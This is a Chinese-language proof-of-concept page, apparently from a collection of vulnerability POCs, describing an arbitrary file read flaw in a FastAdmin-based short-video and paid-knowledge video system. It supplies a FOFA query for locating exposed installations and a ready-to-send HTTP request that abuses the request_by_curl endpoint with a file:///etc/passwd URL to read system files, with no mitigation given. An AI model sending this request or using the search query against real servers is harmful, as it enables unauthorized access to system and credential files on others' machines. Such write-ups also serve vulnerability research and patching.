POC00/短视频系统视频知识付费系统存在任意文件读取漏洞.md

# 短视频系统视频知识付费系统存在任意文件读取漏洞

# 一、漏洞简介
短视频系统视频知识付费系统是FastAdmin框架短视频系统/视频知识付费源码/附带小说系统，系统视频支持包月、单独购买、观影卷等功能。短视频系统视频知识付费系统存在任意文件读取漏洞

# 二、影响版本
+ <font style="color:rgb(51, 51, 51);">短视频系统视频知识付费系统</font>

# <font style="color:rgb(51, 51, 51);">三、资产测绘</font>
+ fofa`"testvideo://login?id="`
+ 特征

![1732590500428-b97fa7a7-1614-41b1-bbe8-c54cb6182208.png](./img/1DDZ9fZyRHdnns0P/1732590500428-b97fa7a7-1614-41b1-bbe8-c54cb6182208-475278.png)

# 四、漏洞复现
```plain
GET /index/index/request_by_curl?remote_server=file:///etc/passwd&post_string=1 HTTP/1.1
Host:
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
```

![1732590542557-0279172f-b4e1-423f-9093-909316a7e452.png](./img/1DDZ9fZyRHdnns0P/1732590542557-0279172f-b4e1-423f-9093-909316a7e452-044964.png)



> 更新: 2024-11-27 10:00:05  
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/rwak2pbxsqgk7mau>